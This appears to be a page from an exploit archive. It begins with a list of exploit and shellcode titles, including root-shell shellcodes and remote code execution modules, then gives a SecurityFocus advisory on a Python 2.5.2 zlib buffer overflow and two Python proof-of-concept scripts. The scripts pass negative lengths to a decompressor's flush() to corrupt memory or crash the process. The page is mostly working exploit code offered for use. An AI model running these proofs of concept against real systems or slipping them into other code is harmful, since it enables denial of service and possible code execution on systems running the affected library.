
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
71 lines
No EOL
2.7 KiB
Python
Executable file
71 lines
No EOL
2.7 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/28715/info
|
|
|
|
Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data.
|
|
|
|
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition.
|
|
|
|
This issue affects Python 2.5.2; other versions may also be vulnerable.
|
|
|
|
python-2.5.2-zlib-unflush-misallocation.py
|
|
------------------------------------------
|
|
#!/usr/bin/python
|
|
|
|
import zlib
|
|
|
|
msg = """
|
|
Desire to know why, and how, curiosity; such as is in no living creature
|
|
but man:
|
|
so that man is distinguished, not only by his reason, but also by this
|
|
singular passion
|
|
from other animals; in whom the appetite of food, and other pleasures of
|
|
sense, by
|
|
predominance, take away the care of knowing causes; which is a lust of
|
|
the mind,
|
|
that by a perseverance of delight in the continual and indefatigable
|
|
generation of knowledge, exceedeth the short vehemence of any carnal
|
|
pleasure.
|
|
"""
|
|
|
|
compMsg = zlib.compress(msg)
|
|
bad = -24
|
|
decompObj = zlib.decompressobj()
|
|
decompObj.decompress(compMsg)
|
|
decompObj.flush(bad)
|
|
|
|
|
|
python-2.5.2-zlib-unflush-signedness.py:
|
|
----------------------------------------
|
|
#!/usr/bin/python
|
|
|
|
import zlib
|
|
|
|
msg = """
|
|
Society in every state is a blessing, but government even in its best
|
|
state is but a necessary evil
|
|
in its worst state an intolerable one; for when we suffer, or are
|
|
exposed to the same miseries by a
|
|
government, which we might expect in a country without government, our
|
|
calamities is heightened by
|
|
reflecting that we furnish the means by which we suffer! Government,
|
|
like dress, is the badge of
|
|
lost innocence; the palaces of kings are built on the ruins of the
|
|
bowers of paradise. For were
|
|
the impulses of conscience clear, uniform, and irresistibly obeyed, man
|
|
would need no other
|
|
lawgiver; but that not being the case, he finds it necessary to
|
|
surrender up a part of his property
|
|
to furnish means for the protection of the rest; and this he is induced
|
|
to do by the same prudence which
|
|
in every other case advises him out of two evils to choose the least.
|
|
Wherefore, security being the true
|
|
design and end of government, it unanswerably follows that whatever form
|
|
thereof appears most likely to
|
|
ensure it to us, with the least expense and greatest benefit, is
|
|
preferable to all others.
|
|
""" * 1024
|
|
|
|
compMsg = zlib.compress(msg)
|
|
bad = -2
|
|
decompObj = zlib.decompressobj()
|
|
decompObj.decompress(compMsg, 1)
|
|
decompObj.flush(bad) |